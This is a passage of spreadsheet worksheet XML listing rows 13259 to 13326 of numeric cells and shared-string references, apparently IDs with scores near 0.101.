      </c>
      <c r="E13259" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13259" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="13260" ht="15.75" customHeight="1">
      <c r="A13260" s="1">
        <v>27092.0</v>
      </c>
      <c r="B13260" s="2">
        <v>2.0520357E7</v>
      </c>
      <c r="C13260" s="2" t="s">
        <v>12756</v>
      </c>
      <c r="D13260" s="2">
        <v>1.0</v>
      </c>
      <c r="E13260" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13260" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="13261" ht="15.75" customHeight="1">
      <c r="A13261" s="1">
        <v>4372.0</v>
      </c>
      <c r="B13261" s="2">
        <v>4.2134699E7</v>
      </c>
      <c r="C13261" s="2" t="s">
        <v>12757</v>
      </c>
      <c r="D13261" s="2">
        <v>1.0</v>
      </c>
      <c r="E13261" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13261" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="13262" ht="15.75" customHeight="1">
      <c r="A13262" s="1">
        <v>9803.0</v>
      </c>
      <c r="B13262" s="2">
        <v>5.6564654E7</v>
      </c>
      <c r="C13262" s="2" t="s">
        <v>12758</v>
      </c>
      <c r="D13262" s="2">
        <v>1.0</v>
      </c>
      <c r="E13262" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13262" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="13263" ht="15.75" customHeight="1">
      <c r="A13263" s="1">
        <v>19603.0</v>
      </c>
      <c r="B13263" s="2">
        <v>5.618341E7</v>
      </c>
      <c r="C13263" s="2" t="s">
        <v>12759</v>
      </c>
      <c r="D13263" s="2">
        <v>1.0</v>
      </c>
      <c r="E13263" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13263" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="13264" ht="15.75" customHeight="1">
      <c r="A13264" s="1">
        <v>817.0</v>
      </c>
      <c r="B13264" s="2">
        <v>2.1405368E7</v>
      </c>
      <c r="C13264" s="2" t="s">
        <v>12760</v>
      </c>
      <c r="D13264" s="2">
        <v>1.0</v>
      </c>
      <c r="E13264" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13264" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13265" ht="15.75" customHeight="1">
      <c r="A13265" s="1">
        <v>2520.0</v>
      </c>
      <c r="B13265" s="2">
        <v>3.4017038E7</v>
      </c>
      <c r="C13265" s="2" t="s">
        <v>12761</v>
      </c>
      <c r="D13265" s="2">
        <v>1.0</v>
      </c>
      <c r="E13265" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13265" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13266" ht="15.75" customHeight="1">
      <c r="A13266" s="1">
        <v>2612.0</v>
      </c>
      <c r="B13266" s="2">
        <v>3443364.0</v>
      </c>
      <c r="C13266" s="2" t="s">
        <v>12762</v>
      </c>
      <c r="D13266" s="2">
        <v>1.0</v>
      </c>
      <c r="E13266" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13266" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13267" ht="15.75" customHeight="1">
      <c r="A13267" s="1">
        <v>2689.0</v>
      </c>
      <c r="B13267" s="2">
        <v>3.4819678E7</v>
      </c>
      <c r="C13267" s="2" t="s">
        <v>12763</v>
      </c>
      <c r="D13267" s="2">
        <v>1.0</v>
      </c>
      <c r="E13267" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13267" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13268" ht="15.75" customHeight="1">
      <c r="A13268" s="1">
        <v>3718.0</v>
      </c>
      <c r="B13268" s="2">
        <v>3.9612333E7</v>
      </c>
      <c r="C13268" s="2" t="s">
        <v>12764</v>
      </c>
      <c r="D13268" s="2">
        <v>1.0</v>
      </c>
      <c r="E13268" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13268" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13269" ht="15.75" customHeight="1">
      <c r="A13269" s="1">
        <v>3971.0</v>
      </c>
      <c r="B13269" s="2">
        <v>4.0774583E7</v>
      </c>
      <c r="C13269" s="2" t="s">
        <v>12765</v>
      </c>
      <c r="D13269" s="2">
        <v>1.0</v>
      </c>
      <c r="E13269" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13269" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13270" ht="15.75" customHeight="1">
      <c r="A13270" s="1">
        <v>4228.0</v>
      </c>
      <c r="B13270" s="2">
        <v>4.1748937E7</v>
      </c>
      <c r="C13270" s="2" t="s">
        <v>12766</v>
      </c>
      <c r="D13270" s="2">
        <v>1.0</v>
      </c>
      <c r="E13270" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13270" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13271" ht="15.75" customHeight="1">
      <c r="A13271" s="1">
        <v>4258.0</v>
      </c>
      <c r="B13271" s="2">
        <v>4.1822694E7</v>
      </c>
      <c r="C13271" s="2" t="s">
        <v>12767</v>
      </c>
      <c r="D13271" s="2">
        <v>1.0</v>
      </c>
      <c r="E13271" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13271" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13272" ht="15.75" customHeight="1">
      <c r="A13272" s="1">
        <v>5026.0</v>
      </c>
      <c r="B13272" s="2">
        <v>4.4244375E7</v>
      </c>
      <c r="C13272" s="2" t="s">
        <v>12768</v>
      </c>
      <c r="D13272" s="2">
        <v>1.0</v>
      </c>
      <c r="E13272" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13272" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13273" ht="15.75" customHeight="1">
      <c r="A13273" s="1">
        <v>5085.0</v>
      </c>
      <c r="B13273" s="2">
        <v>4.4477811E7</v>
      </c>
      <c r="C13273" s="2" t="s">
        <v>12769</v>
      </c>
      <c r="D13273" s="2">
        <v>1.0</v>
      </c>
      <c r="E13273" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13273" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13274" ht="15.75" customHeight="1">
      <c r="A13274" s="1">
        <v>5293.0</v>
      </c>
      <c r="B13274" s="2">
        <v>4.5214704E7</v>
      </c>
      <c r="C13274" s="2" t="s">
        <v>12770</v>
      </c>
      <c r="D13274" s="2">
        <v>1.0</v>
      </c>
      <c r="E13274" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13274" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13275" ht="15.75" customHeight="1">
      <c r="A13275" s="1">
        <v>5364.0</v>
      </c>
      <c r="B13275" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C13275" s="2" t="s">
        <v>12771</v>
      </c>
      <c r="D13275" s="2">
        <v>1.0</v>
      </c>
      <c r="E13275" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13275" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13276" ht="15.75" customHeight="1">
      <c r="A13276" s="1">
        <v>5397.0</v>
      </c>
      <c r="B13276" s="2">
        <v>4.5467433E7</v>
      </c>
      <c r="C13276" s="2" t="s">
        <v>12772</v>
      </c>
      <c r="D13276" s="2">
        <v>1.0</v>
      </c>
      <c r="E13276" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13276" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13277" ht="15.75" customHeight="1">
      <c r="A13277" s="1">
        <v>5467.0</v>
      </c>
      <c r="B13277" s="2">
        <v>4.5672681E7</v>
      </c>
      <c r="C13277" s="2" t="s">
        <v>12773</v>
      </c>
      <c r="D13277" s="2">
        <v>1.0</v>
      </c>
      <c r="E13277" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13277" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13278" ht="15.75" customHeight="1">
      <c r="A13278" s="1">
        <v>5755.0</v>
      </c>
      <c r="B13278" s="2">
        <v>4.6668226E7</v>
      </c>
      <c r="C13278" s="2" t="s">
        <v>12774</v>
      </c>
      <c r="D13278" s="2">
        <v>1.0</v>
      </c>
      <c r="E13278" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13278" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13279" ht="15.75" customHeight="1">
      <c r="A13279" s="1">
        <v>5869.0</v>
      </c>
      <c r="B13279" s="2">
        <v>4.7005838E7</v>
      </c>
      <c r="C13279" s="2" t="s">
        <v>12775</v>
      </c>
      <c r="D13279" s="2">
        <v>1.0</v>
      </c>
      <c r="E13279" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13279" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13280" ht="15.75" customHeight="1">
      <c r="A13280" s="1">
        <v>6200.0</v>
      </c>
      <c r="B13280" s="2">
        <v>4.7959452E7</v>
      </c>
      <c r="C13280" s="2" t="s">
        <v>12776</v>
      </c>
      <c r="D13280" s="2">
        <v>1.0</v>
      </c>
      <c r="E13280" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13280" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13281" ht="15.75" customHeight="1">
      <c r="A13281" s="1">
        <v>6476.0</v>
      </c>
      <c r="B13281" s="2">
        <v>4.866475E7</v>
      </c>
      <c r="C13281" s="2" t="s">
        <v>12777</v>
      </c>
      <c r="D13281" s="2">
        <v>1.0</v>
      </c>
      <c r="E13281" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13281" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13282" ht="15.75" customHeight="1">
      <c r="A13282" s="1">
        <v>6630.0</v>
      </c>
      <c r="B13282" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C13282" s="2" t="s">
        <v>12778</v>
      </c>
      <c r="D13282" s="2">
        <v>1.0</v>
      </c>
      <c r="E13282" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13282" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13283" ht="15.75" customHeight="1">
      <c r="A13283" s="1">
        <v>6720.0</v>
      </c>
      <c r="B13283" s="2">
        <v>4.9280665E7</v>
      </c>
      <c r="C13283" s="2" t="s">
        <v>12779</v>
      </c>
      <c r="D13283" s="2">
        <v>1.0</v>
      </c>
      <c r="E13283" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13283" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13284" ht="15.75" customHeight="1">
      <c r="A13284" s="1">
        <v>6759.0</v>
      </c>
      <c r="B13284" s="2">
        <v>4.940417E7</v>
      </c>
      <c r="C13284" s="2" t="s">
        <v>12780</v>
      </c>
      <c r="D13284" s="2">
        <v>1.0</v>
      </c>
      <c r="E13284" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13284" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13285" ht="15.75" customHeight="1">
      <c r="A13285" s="1">
        <v>7386.0</v>
      </c>
      <c r="B13285" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C13285" s="2" t="s">
        <v>12781</v>
      </c>
      <c r="D13285" s="2">
        <v>1.0</v>
      </c>
      <c r="E13285" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13285" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13286" ht="15.75" customHeight="1">
      <c r="A13286" s="1">
        <v>7951.0</v>
      </c>
      <c r="B13286" s="2">
        <v>5.2646438E7</v>
      </c>
      <c r="C13286" s="2" t="s">
        <v>12782</v>
      </c>
      <c r="D13286" s="2">
        <v>1.0</v>
      </c>
      <c r="E13286" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13286" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13287" ht="15.75" customHeight="1">
      <c r="A13287" s="1">
        <v>7986.0</v>
      </c>
      <c r="B13287" s="2">
        <v>5.2740945E7</v>
      </c>
      <c r="C13287" s="2" t="s">
        <v>12783</v>
      </c>
      <c r="D13287" s="2">
        <v>1.0</v>
      </c>
      <c r="E13287" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13287" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13288" ht="15.75" customHeight="1">
      <c r="A13288" s="1">
        <v>7994.0</v>
      </c>
      <c r="B13288" s="2">
        <v>5.2767935E7</v>
      </c>
      <c r="C13288" s="2" t="s">
        <v>12784</v>
      </c>
      <c r="D13288" s="2">
        <v>1.0</v>
      </c>
      <c r="E13288" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13288" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13289" ht="15.75" customHeight="1">
      <c r="A13289" s="1">
        <v>8153.0</v>
      </c>
      <c r="B13289" s="2">
        <v>5.3180701E7</v>
      </c>
      <c r="C13289" s="2" t="s">
        <v>12785</v>
      </c>
      <c r="D13289" s="2">
        <v>1.0</v>
      </c>
      <c r="E13289" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13289" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13290" ht="15.75" customHeight="1">
      <c r="A13290" s="1">
        <v>8237.0</v>
      </c>
      <c r="B13290" s="2">
        <v>5.3357553E7</v>
      </c>
      <c r="C13290" s="2" t="s">
        <v>12786</v>
      </c>
      <c r="D13290" s="2">
        <v>1.0</v>
      </c>
      <c r="E13290" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13290" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13291" ht="15.75" customHeight="1">
      <c r="A13291" s="1">
        <v>8288.0</v>
      </c>
      <c r="B13291" s="2">
        <v>5.351191E7</v>
      </c>
      <c r="C13291" s="2" t="s">
        <v>12787</v>
      </c>
      <c r="D13291" s="2">
        <v>1.0</v>
      </c>
      <c r="E13291" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13291" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13292" ht="15.75" customHeight="1">
      <c r="A13292" s="1">
        <v>8540.0</v>
      </c>
      <c r="B13292" s="2">
        <v>5.4131101E7</v>
      </c>
      <c r="C13292" s="2" t="s">
        <v>12788</v>
      </c>
      <c r="D13292" s="2">
        <v>1.0</v>
      </c>
      <c r="E13292" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13292" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13293" ht="15.75" customHeight="1">
      <c r="A13293" s="1">
        <v>8579.0</v>
      </c>
      <c r="B13293" s="2">
        <v>5.4217149E7</v>
      </c>
      <c r="C13293" s="2" t="s">
        <v>12789</v>
      </c>
      <c r="D13293" s="2">
        <v>1.0</v>
      </c>
      <c r="E13293" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13293" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13294" ht="15.75" customHeight="1">
      <c r="A13294" s="1">
        <v>9174.0</v>
      </c>
      <c r="B13294" s="2">
        <v>5.5347469E7</v>
      </c>
      <c r="C13294" s="2" t="s">
        <v>12790</v>
      </c>
      <c r="D13294" s="2">
        <v>1.0</v>
      </c>
      <c r="E13294" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13294" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13295" ht="15.75" customHeight="1">
      <c r="A13295" s="1">
        <v>10409.0</v>
      </c>
      <c r="B13295" s="2">
        <v>9801614.0</v>
      </c>
      <c r="C13295" s="2" t="s">
        <v>12791</v>
      </c>
      <c r="D13295" s="2">
        <v>1.0</v>
      </c>
      <c r="E13295" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13295" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13296" ht="15.75" customHeight="1">
      <c r="A13296" s="1">
        <v>12880.0</v>
      </c>
      <c r="B13296" s="2">
        <v>3.1977162E7</v>
      </c>
      <c r="C13296" s="2" t="s">
        <v>12792</v>
      </c>
      <c r="D13296" s="2">
        <v>1.0</v>
      </c>
      <c r="E13296" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13296" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13297" ht="15.75" customHeight="1">
      <c r="A13297" s="1">
        <v>13956.0</v>
      </c>
      <c r="B13297" s="2">
        <v>3.7298203E7</v>
      </c>
      <c r="C13297" s="2" t="s">
        <v>12793</v>
      </c>
      <c r="D13297" s="2">
        <v>1.0</v>
      </c>
      <c r="E13297" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13297" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13298" ht="15.75" customHeight="1">
      <c r="A13298" s="1">
        <v>14523.0</v>
      </c>
      <c r="B13298" s="2">
        <v>3.9782655E7</v>
      </c>
      <c r="C13298" s="2" t="s">
        <v>12794</v>
      </c>
      <c r="D13298" s="2">
        <v>1.0</v>
      </c>
      <c r="E13298" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13298" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13299" ht="15.75" customHeight="1">
      <c r="A13299" s="1">
        <v>14760.0</v>
      </c>
      <c r="B13299" s="2">
        <v>4.0823782E7</v>
      </c>
      <c r="C13299" s="2" t="s">
        <v>12795</v>
      </c>
      <c r="D13299" s="2">
        <v>1.0</v>
      </c>
      <c r="E13299" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13299" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13300" ht="15.75" customHeight="1">
      <c r="A13300" s="1">
        <v>15048.0</v>
      </c>
      <c r="B13300" s="2">
        <v>4.1614821E7</v>
      </c>
      <c r="C13300" s="2" t="s">
        <v>12796</v>
      </c>
      <c r="D13300" s="2">
        <v>1.0</v>
      </c>
      <c r="E13300" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13300" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13301" ht="15.75" customHeight="1">
      <c r="A13301" s="1">
        <v>15530.0</v>
      </c>
      <c r="B13301" s="2">
        <v>4.3303727E7</v>
      </c>
      <c r="C13301" s="2" t="s">
        <v>12797</v>
      </c>
      <c r="D13301" s="2">
        <v>1.0</v>
      </c>
      <c r="E13301" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13301" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13302" ht="15.75" customHeight="1">
      <c r="A13302" s="1">
        <v>15537.0</v>
      </c>
      <c r="B13302" s="2">
        <v>4.3344024E7</v>
      </c>
      <c r="C13302" s="2" t="s">
        <v>12798</v>
      </c>
      <c r="D13302" s="2">
        <v>1.0</v>
      </c>
      <c r="E13302" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13302" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13303" ht="15.75" customHeight="1">
      <c r="A13303" s="1">
        <v>15543.0</v>
      </c>
      <c r="B13303" s="2">
        <v>4.3376929E7</v>
      </c>
      <c r="C13303" s="2" t="s">
        <v>12799</v>
      </c>
      <c r="D13303" s="2">
        <v>1.0</v>
      </c>
      <c r="E13303" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13303" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13304" ht="15.75" customHeight="1">
      <c r="A13304" s="1">
        <v>16325.0</v>
      </c>
      <c r="B13304" s="2">
        <v>4.5993988E7</v>
      </c>
      <c r="C13304" s="2" t="s">
        <v>12800</v>
      </c>
      <c r="D13304" s="2">
        <v>1.0</v>
      </c>
      <c r="E13304" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13304" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13305" ht="15.75" customHeight="1">
      <c r="A13305" s="1">
        <v>16829.0</v>
      </c>
      <c r="B13305" s="2">
        <v>4.7879079E7</v>
      </c>
      <c r="C13305" s="2" t="s">
        <v>12801</v>
      </c>
      <c r="D13305" s="2">
        <v>1.0</v>
      </c>
      <c r="E13305" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13305" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13306" ht="15.75" customHeight="1">
      <c r="A13306" s="1">
        <v>17914.0</v>
      </c>
      <c r="B13306" s="2">
        <v>5.1148912E7</v>
      </c>
      <c r="C13306" s="2" t="s">
        <v>12802</v>
      </c>
      <c r="D13306" s="2">
        <v>1.0</v>
      </c>
      <c r="E13306" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13306" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13307" ht="15.75" customHeight="1">
      <c r="A13307" s="1">
        <v>17958.0</v>
      </c>
      <c r="B13307" s="2">
        <v>5.1296488E7</v>
      </c>
      <c r="C13307" s="2" t="s">
        <v>12803</v>
      </c>
      <c r="D13307" s="2">
        <v>1.0</v>
      </c>
      <c r="E13307" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13307" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13308" ht="15.75" customHeight="1">
      <c r="A13308" s="1">
        <v>17992.0</v>
      </c>
      <c r="B13308" s="2">
        <v>5.1400735E7</v>
      </c>
      <c r="C13308" s="2" t="s">
        <v>12804</v>
      </c>
      <c r="D13308" s="2">
        <v>1.0</v>
      </c>
      <c r="E13308" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13308" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13309" ht="15.75" customHeight="1">
      <c r="A13309" s="1">
        <v>18209.0</v>
      </c>
      <c r="B13309" s="2">
        <v>5.2066782E7</v>
      </c>
      <c r="C13309" s="2" t="s">
        <v>12805</v>
      </c>
      <c r="D13309" s="2">
        <v>1.0</v>
      </c>
      <c r="E13309" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13309" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13310" ht="15.75" customHeight="1">
      <c r="A13310" s="1">
        <v>18437.0</v>
      </c>
      <c r="B13310" s="2">
        <v>5.2744938E7</v>
      </c>
      <c r="C13310" s="2" t="s">
        <v>12806</v>
      </c>
      <c r="D13310" s="2">
        <v>1.0</v>
      </c>
      <c r="E13310" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13310" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13311" ht="15.75" customHeight="1">
      <c r="A13311" s="1">
        <v>18969.0</v>
      </c>
      <c r="B13311" s="2">
        <v>5.4369819E7</v>
      </c>
      <c r="C13311" s="2" t="s">
        <v>12807</v>
      </c>
      <c r="D13311" s="2">
        <v>1.0</v>
      </c>
      <c r="E13311" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13311" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13312" ht="15.75" customHeight="1">
      <c r="A13312" s="1">
        <v>19072.0</v>
      </c>
      <c r="B13312" s="2">
        <v>5.461191E7</v>
      </c>
      <c r="C13312" s="2" t="s">
        <v>12808</v>
      </c>
      <c r="D13312" s="2">
        <v>1.0</v>
      </c>
      <c r="E13312" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13312" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13313" ht="15.75" customHeight="1">
      <c r="A13313" s="1">
        <v>19081.0</v>
      </c>
      <c r="B13313" s="2">
        <v>5.4642422E7</v>
      </c>
      <c r="C13313" s="2" t="s">
        <v>12809</v>
      </c>
      <c r="D13313" s="2">
        <v>1.0</v>
      </c>
      <c r="E13313" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13313" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13314" ht="15.75" customHeight="1">
      <c r="A13314" s="1">
        <v>19281.0</v>
      </c>
      <c r="B13314" s="2">
        <v>5.5164666E7</v>
      </c>
      <c r="C13314" s="2" t="s">
        <v>12810</v>
      </c>
      <c r="D13314" s="2">
        <v>1.0</v>
      </c>
      <c r="E13314" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13314" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13315" ht="15.75" customHeight="1">
      <c r="A13315" s="1">
        <v>19449.0</v>
      </c>
      <c r="B13315" s="2">
        <v>5.5729674E7</v>
      </c>
      <c r="C13315" s="2" t="s">
        <v>12811</v>
      </c>
      <c r="D13315" s="2">
        <v>1.0</v>
      </c>
      <c r="E13315" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13315" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13316" ht="15.75" customHeight="1">
      <c r="A13316" s="1">
        <v>19607.0</v>
      </c>
      <c r="B13316" s="2">
        <v>5.6185311E7</v>
      </c>
      <c r="C13316" s="2" t="s">
        <v>12812</v>
      </c>
      <c r="D13316" s="2">
        <v>1.0</v>
      </c>
      <c r="E13316" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13316" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13317" ht="15.75" customHeight="1">
      <c r="A13317" s="1">
        <v>20138.0</v>
      </c>
      <c r="B13317" s="2">
        <v>1.0133731E7</v>
      </c>
      <c r="C13317" s="2" t="s">
        <v>12813</v>
      </c>
      <c r="D13317" s="2">
        <v>1.0</v>
      </c>
      <c r="E13317" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13317" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13318" ht="15.75" customHeight="1">
      <c r="A13318" s="1">
        <v>20625.0</v>
      </c>
      <c r="B13318" s="2">
        <v>1.4076375E7</v>
      </c>
      <c r="C13318" s="2" t="s">
        <v>12814</v>
      </c>
      <c r="D13318" s="2">
        <v>1.0</v>
      </c>
      <c r="E13318" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13318" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13319" ht="15.75" customHeight="1">
      <c r="A13319" s="1">
        <v>20944.0</v>
      </c>
      <c r="B13319" s="2">
        <v>1.6566858E7</v>
      </c>
      <c r="C13319" s="2" t="s">
        <v>12815</v>
      </c>
      <c r="D13319" s="2">
        <v>1.0</v>
      </c>
      <c r="E13319" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13319" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13320" ht="15.75" customHeight="1">
      <c r="A13320" s="1">
        <v>23205.0</v>
      </c>
      <c r="B13320" s="2">
        <v>5256444.0</v>
      </c>
      <c r="C13320" s="2" t="s">
        <v>12816</v>
      </c>
      <c r="D13320" s="2">
        <v>1.0</v>
      </c>
      <c r="E13320" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13320" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13321" ht="15.75" customHeight="1">
      <c r="A13321" s="1">
        <v>23339.0</v>
      </c>
      <c r="B13321" s="2">
        <v>5.4743431E7</v>
      </c>
      <c r="C13321" s="2" t="s">
        <v>12817</v>
      </c>
      <c r="D13321" s="2">
        <v>1.0</v>
      </c>
      <c r="E13321" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13321" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13322" ht="15.75" customHeight="1">
      <c r="A13322" s="1">
        <v>23537.0</v>
      </c>
      <c r="B13322" s="2">
        <v>5953885.0</v>
      </c>
      <c r="C13322" s="2" t="s">
        <v>12818</v>
      </c>
      <c r="D13322" s="2">
        <v>1.0</v>
      </c>
      <c r="E13322" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13322" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13323" ht="15.75" customHeight="1">
      <c r="A13323" s="1">
        <v>24107.0</v>
      </c>
      <c r="B13323" s="2">
        <v>9866048.0</v>
      </c>
      <c r="C13323" s="2" t="s">
        <v>12819</v>
      </c>
      <c r="D13323" s="2">
        <v>1.0</v>
      </c>
      <c r="E13323" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13323" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13324" ht="15.75" customHeight="1">
      <c r="A13324" s="1">
        <v>24156.0</v>
      </c>
      <c r="B13324" s="2">
        <v>1.013373E7</v>
      </c>
      <c r="C13324" s="2" t="s">
        <v>12813</v>
      </c>
      <c r="D13324" s="2">
        <v>1.0</v>
      </c>
      <c r="E13324" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13324" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13325" ht="15.75" customHeight="1">
      <c r="A13325" s="1">
        <v>25495.0</v>
      </c>
      <c r="B13325" s="2">
        <v>1.4076374E7</v>
      </c>
      <c r="C13325" s="2" t="s">
        <v>12814</v>
      </c>
      <c r="D13325" s="2">
        <v>1.0</v>
      </c>
      <c r="E13325" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13325" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13326" ht="15.75" customHeight="1">
      <c r="A13326" s="1">
        <v>26301.0</v>
      </c>
      <c r="B13326" s="2">
        <v>1.6566857E7</v>
      </c>
      <c r="C13326" s="2" t="s">
        <v>12820</v>
      </c>
      <c r="D13326" s="2">
        <v>1.0</v>
      </c>
